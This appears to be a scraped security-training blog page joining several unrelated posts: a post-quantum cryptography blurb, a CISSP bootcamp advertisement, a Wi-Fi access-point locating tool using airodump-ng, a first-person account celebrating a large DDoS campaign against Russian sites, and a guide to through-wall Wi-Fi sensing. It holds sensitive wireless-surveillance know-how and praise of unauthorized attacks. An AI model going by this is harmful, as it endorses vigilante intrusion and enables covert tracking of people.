Post-quantum cryptography (PQC) is the field focused on designing and standardizing cryptographic algorithms that are secure against attacks by both classical computers and future quantum computers. It aims to protect data and communications from being decrypted by powerful quantum machines that could break today’s widely used public-key cryptography, such as RSA and Elliptic Curve schemes.
To implement post quantum cryptography will mean replacing today’s hardware and software with new IT infrastructure. Those who fail to do this will no longer enjoy the benefits of confidentiality and privacy. Until this new infrastructure is deployed, the first movers with access to quantum systems will be able break everyone’s cryptography.
Summary
Quantum computing will radically reshape the threat landscape—eroding the security of current systems. Once the state-sponsored entities from the US, Russia, China, and Israel have these systems at their disposal, none of information will be safe. Remember that asymmetric encryption is usually used for key exchange between communicating systems. If the key exchange can be intercepted, nothing is safe!
The CISSP is widely considered to be the premier cybersecurity certifications. The average salary in the US is almost $150,000 and I’ll bet your boss has one.
If not, their boss is certified with the CISSP.
This is your ticket to a rewarding, high-paying career in cybersecurity.
A Four-Day boot camp, September 23-26
Now, you can go to the head of the class in cybersecurity with this 4-day intensive bootcamp with Master OTW. This class is available to everyone in the Subscriber package or you can buy the individual LIVE class for just $199
Even if you won’t be taking the exam and earning the certification, this is an excellent class to learn in-depth cybersecurity techniques and technologies used by secure companies from around the world and will help you throughout your long and prosperous career in cybersecurity
Take a look what our students have said about our CISSP bootcamps.
One of our advanced student who goes by the handle Mike211 has developed a Wi-Fi scanning script that we want to share with all of you. What makes this script different and special is it’s ability to locate the Wi-Fi access points (AP) in your area.
I”ll let him introduce his new tool below!
In the Wi-Fi domain, raw signal strength and MAC identifiers can reveal more than just the presence of networks — they can open a path to estimating physical distance, mapping access points, and even executing wardriving missions or indoor localization without GPS. If you’ve ever wanted to push the boundaries of Wi-Fi auditing beyond mere detection, Hackers Arise Radar is your next-level tool.
Why this Tool is Game Changing
Just like Wigle.net collects crowdsourced location data of APs, this project allows you to discover and map Wi-Fi access points in real-time using only your Linux laptop or USB Wi-Fi adapter.
With this tool, you’ll get:
– Continuous scans over 2.4 GHz, 5 GHz, 6 GHz, or all bands – Fully automated interface setup (monitor mode, regulatory domain, TX power) – Filtered and smoothed RSSI values with Kalman filtering – On-demand calibration for RSSI-to-distance – Spring-model map generation to visualize spatial relationships – Exportable logs, visuals, and calibration profiles for future use
Whether you’re driving through a city, walking indoors, or performing a pentest, you can leverage this tool for actionable location data.
How it Works – Step by Step
Step #1. Launch & Configuration
Start the script:
kali > sudo python3 Hackers_Arise_Radar.py
You’ll be greeted with a colorful terminal interface that guides you through:
– Selecting your Wi-Fi interface – Choosing the operational environment (indoor, urban, open space) – Selecting scan band (2.4 GHz / 5 GHz / 6 GHz / All)
No need to manually enable monitor mode – the script automatically puts your adapter into monitor mode, sets the regulatory domain, and adjusts TX power based on your choices.
Step #2. Real-Time Wi-Fi Scanning
The script uses airodump-ng behind the scenes to: – Continuously scan surrounding Wi-Fi networks – Record BSSID, SSID, RSSI, channel, frequency band – Stream live updates through a structured CSV output for parsing and analysis
Step #3. RSSI Filtering & Analytics
To reduce RSSI noise, the script implements a Kalman filter This Kalman filter:
– Smooths out transient signal spikes – Creates a rolling average of RSSI per BSSID – Improves distance estimation consistency
Step #4. Estimating Distance from RSSI
The tool calculates the distance using a log-distance path loss model such as:
d = 10^((TX_power – RSSI) / (10 * n))
Where: – TX_power and path-loss exponent n are customizable or calculated through calibration – RSSI is dynamically filtered – Distance is measured in meters
Step #5. Calibration Engine
The included calibration module lets you:
– Input known RSSI and real-world distances – Fit an optimized curve per BSSID – Automatically store TX power, path-loss exponent, and R² fit for reuse – Flag poorly calibrated networks with suggestions
Step #6. Visual Mapping – Spring Model Layout
Once enough data is gathered, the tool uses a spring-model algorithm to create a map: – Nodes (BSSIDs) are arranged based on estimated distances – Forces push/pull the layout into geometric balance – Labels show SSIDs, bands, and estimated distance in meters
Step #7. Regulatory & Power Tuning Mode
The tool isn’t just a scanner — it includes a dedicated utility mode to:
– Set regulatory domain (iw reg set <country_code>) – Modify TX power (in dBm) – Retrieve and display current wireless driver info – Perform diagnostics before scanning
Focus Mode: Tracking a Single Access Point
Sometimes you just need to follow one Wi-Fi target — whether it’s a rogue device, a signal beacon, or an access point you’re using for indoor positioning.
Hackers Arise Radar includes a specialized mode for scanning and tracking a single BSSID:
– Select a known access point from your previously scanned list – The tool locks onto that specific MAC address using: airodump-ng –bssid <target> –channel <ch> – RSSI values are filtered using a Kalman filter – Distance estimation is updated in real-time using the calibration profile – Live updates show proximity and confidence
No need to prep interfaces — the tool handles it all.
Summary
Hackers Arise Radar is more than just a scanner. It is a fully interactive system for Wi-Fi discovery, proximity estimation, map generation, and interface configuration — all controlled through an elegant terminal menu.
Built for hackers, engineers, educators, and hobbyists, this tool empowers you to: – Visualize your wireless environment – Optimize TX power and regulatory settings – Log and export clean data – Build wireless maps with zero GPS
Start scanning smarter — not harder.
For more information on this unique and powerful scanner, see our Wi-Fi Hacking training.
In this series, we will detail how an individual or small group of cyberwarriors can impact global geopolitics. The knowledge and tools that YOU hold are a superpower that can change history.
Use it wisely.
To begin this discussion, let’s look at the actions of a small group of hackers at the outset of the Russian invasion of Ukraine. We will detail these actions up to the present, attempting to demonstrate that even a single individual or small group can influence global outcomes in our connected digital world. Cyber war is real and even a single individual can have an impact on global political outcomes.
Let’s begin in February 2022, nearly 3 years ago. At that time, Ukraine was struggling to throw off the yoke of Russian domination. As a former member state of the Soviet Union (the successor to the Romanov’s Russian Empire), they declared their independence, like so many former Soviet republics (such as Estonia, Latvia, Lithuania, Georgia, Armenia, Kazakhstan, and others) from that failed and brutal alliance in 1991 (this is the moment that the Soviet Union disintegrated). This union failed primarily due to the inability of the Soviet Union to address the needs of their citizens. Simple things like food, clean water, and consumer goods. And, of course, the tyranny.
Russia, having lost absolute control of these nations, attempted to maintain influence and control by bending their leaders to Putin’s will. In Ukraine, this meant a string of leaders who answered to Putin, rather than the Ukrainian people. In addition, Russian state-sponsored hackers such as Sandworm, attacked Ukraine’s digital infrastructure repeatedly to create chaos and confusion within the populace. This included the famous BlackEnergy3 attack in 2014 against the Ukrainian power transmission system that blacked out large segments of Ukraine in the depths of winter (for more on this and other Russian cyberattacks against Ukraine, read this article).
In February 2022, the US and Western intelligence agencies warned of an imminent attack from Russia on Ukraine. In an unprecedented move, the US president and the intelligence community revealed, (based upon satellite and human intelligence-) that Russia was about to invade Ukraine. The new Ukrainian president, Volodymyr Zelenskyy, publicly denied and tried to minimize the probability that an attack was about to take place. Zelenskyy had been a popular comedian and actor in Ukraine (there is a Netflix comedy made by Zelenskyy before he became president named “Servant of the People”) and was elected president in a landslide election as the people of Ukraine attempted to clean Russian domination from their politics and become part of the free Europe. Zelenskyy may have denied the likelihood of a Russian attack to bolster the public mood in Ukraine and not anger the Russian leader (Ukraine and Russia have long family ties on both sides of the border) .
We at Hackers-Arise took these warnings to heart and started to prepare.
List of Targets in Russia
First, we enumerated the key websites and IP addresses of critical and essential Russian military and commercial interests. There was no time to do extensive vulnerability research on each of those sites with the attack imminent, so instead, we readied one of the largest DDoS attacks in history! The goal was to disable the Russians’ ability to use their websites and digital communications to further their war ends and cripple their economy. This is exactly the same tactic that Russia had used in previous cyber wars against their former republics, Georgia and Estonia. In fact, at the same time, Russian hackers had compromised the ViaSat satellite internet service and were about to send Ukraine and parts of Europe into Internet darkness (read about this attack here).
We put out the word to hackers around the world to prepare. Tens of thousands of hackers prepared to protect Ukraine’s sovereignty. Eventually, when Russian troops crossed the border into Ukraine on February 24, 2022, we were ready. At this point in time, Ukraine created the IT Army of Ukraine and requested assistance from hackers across the world, including Hackers-Arise.
Within minutes, we launched the largest DDoS attack the Russians had ever seen, over 760GB/sec (as documented later by the Russian telecom provider, Rostelcom). This was twice the size of any DDoS attack in Russian history (https://www.bleepingcomputer.com/news/security/russia-s-largest-isp-says-2022-broke-all-ddos-attack-records/) This attack was a coordinated DDoS attack against approximately 50 sites in Russia such as the Department of Defense, the Moscow Stock Exchange, Gazprom, and other key commercial and military interests.
As a result of this attack, Russian military and commercial interests were hamstrung. Websites were unreachable and communication was hampered. After the fact, Russian government leaders estimated that 17,000 IP addresses had participated and they vowed to exact revenge on all 17,000 of us (we estimated the actual number was closer to 100,000).
This massive DDoS attack, unlike any Russia had ever seen and totally unexpected by Russian leaders, hampered the coordination of military efforts and brought parts of the Russian economy to its knees. The Moscow Stock Exchange shut down and the largest bank, Sberbank, closed. This attack continued for about 6 weeks and effectively sent the message to the Russian leaders that the global hacker/cyberwarrior community opposed their aggression and was willing to do something about it. This was a
first in the history of the world!
The attack was simple in the context of DDoS attacks. Most DDoS attacks in our modern era involve layer 7 resources to make sites unavailable, but this one was simply an attack to clog the pipelines in Russia with “garbage” traffic. It worked. It worked largely because Russia was arrogant and unprepared without adequate DDoS protection from the likes of Cloudflare or Radware.
Within days, we began a new campaign to target the Russian oligarchs, the greatest beneficiaries of Putin’s kleptocracy (you can read more about it here). These oligarchs are complicit in robbing the Russian people of their resources and income for their benefit. They are the linchpin that keeps the murderer, Putin, in power. In this campaign, initiated by Hackers-Arise, we sought to harass the oligarchs in their yachts throughout the world (the oligarchs escape Russia whenever they can). We sought to first (1) identify their yachts, then (2) locate their yachts, and finally (3) send concerned citizens to block their fueling and re-supply. In very short order, this campaign evolved into a program to capture these same super yachts and hold them until the war was over, eventually to sell and raise funds to rebuild Ukraine. We successfully identified, located, and seized the top 9 oligarch yachts (worth billions of USD), including Putin’s personal yacht (this was the most difficult). All of them were seized by NATO forces and are still being held.
In the next few posts here we will detail;
The request from the Ukraine Army to hack IP cameras in Ukraine for surveillance and our success in doing so;
The attacks against Russian industrial systems resulted in damaging fires and other malfunctions.
Look for Master OTW’s book, “A Cyberwarrior Handbook”, coming in 2026.
It might seem like science fiction, but now we have the capability to “see” through walls and track the location and movement of targets. This is thanks to new technological developments in both artificial intelligence and SDR. Remember, Wi-Fi is simply sending and receiving radio signals at 2.45Ghz. If an object is in the way of the signal, it bounces, bends and refracts the signal. This perturbing of the signal can be very complex but advances in machine learning (ML) and AI now make it possible to to collect and track those changes in the signal and determine if it’s a human, dog, or an intruder. This is the beginning of something exciting, and quite possibly, malicious.
This is one more reason why we say that SDR (Signals Intelligence) for Hackers is the leading edge of cybersecurity!
The Science Behind Wi-Fi Sensing
How It Works
Wi-Fi signals are electromagnetic waves that can pass through common wall materials like drywall, wood, and even concrete (with some signal loss).
When these signals encounter objects, especially humans, they reflect, scatter, and diffract.
By analyzing how Wi-Fi signals bounce back, it’s possible to detect the presence, movement, and even the shape of people behind walls.
Key Concepts
Phase and Amplitude: The changes in phase and amplitude of the Wi-Fi signal carry information about what the signal has encountered.
Multipath Propagation: Wi-Fi signals reflect off multiple surfaces, producing a complex pattern that can be decoded to reveal movement and location.
DensePose & Neural Networks: Modern systems use AI to map Wi-Fi signal changes to specific points on the human body, reconstructing pose and movement in 3D.
The Hardware
You don’t need military-grade gear. Here’s what’s commonly used:
Standard Wi-Fi Routers: Most experiments use commodity routers with multiple antennas.
Software-Defined Radios (SDRs): For more control and precision, SDRs like the HackRF or USRP can be used (see our tutorials and trainings on SDR for Hackers)
Multiple Antennas: At least two, but three or more improves accuracy and resolution.
The Software
Data Collection
Transmit & Receive: One device sends out Wi-Fi signals, another listens for reflections.
Channel State Information (CSI): This is the raw data showing how signals have changed after bouncing off objects.
Processing
Signal Processing: Algorithms filter out static objects (walls, furniture) and focus on moving targets (people).
Neural Networks: AI models such as DensePose map signal changes to body coordinates, reconstructing a “pose” for each detected person
Wi-Fi Sensing in Action
Step 1: Set Up Your Equipment
Place a Wi-Fi transmitter and receiver on opposite sides of the wall.
Ensure both devices can log CSI data. Some routers can be flashed with custom firmware (e.g., OpenWRT) to access this.
Step 2: Collect CSI Data
Use tools like Atheros CSI Tool or Intel 5300 CSI Tool to capture the raw signal data.
Move around on the far side of the wall to generate reflections.
Step 3: Process the Data
Use Python libraries or MATLAB scripts to process the CSI data.
Apply filters to remove noise and static reflections.
Feed the cleaned data into a pre-trained neural network (like DensePose) to reconstruct human poses
Step 4: Visualize the Results
The output can be a 2D or 3D “stick figure” or heatmap showing where people are and how they’re moving.
Some setups can even distinguish between individuals based on movement patterns.
Limitations and Considerations
Wall Material: Thicker or metal-reinforced walls reduce accuracy.
Privacy: This technology raises major privacy concerns—anyone with the right tools could potentially “see” through your walls.
Legality: Unauthorized use of such technology may violate laws or regulations.
Real-World Applications
Security: Detecting intruders or monitoring restricted areas. Companies like TruShield are offering commercial home security systems based upon this technology.
Elder Care: Monitoring movement for safety without cameras.
Smart Homes: Automating lighting or HVAC based on occupancy.
Law Enforcement: Law enforcement agencies can detect and track suspects in their homes
Intelligence Agencies: Can Use this technology to track spies or other suspects.
Summary
Wi-Fi sensing is a powerful, rapidly advancing field. With basic hardware (HackRF) and open-source tools, it’s possible to experiment with through-wall detection. This opens a whole new horizon in Wi-Fi Hacking and SDR for Hackers.
For more on this technology, attend our upcoming Wi-Fi Hacking training, July 22-24. If you are interested in building this device, look for our 2026 SDR for Hackers training.
As always, use this knowledge responsibly and be aware of the ethical and legal implications.
Login
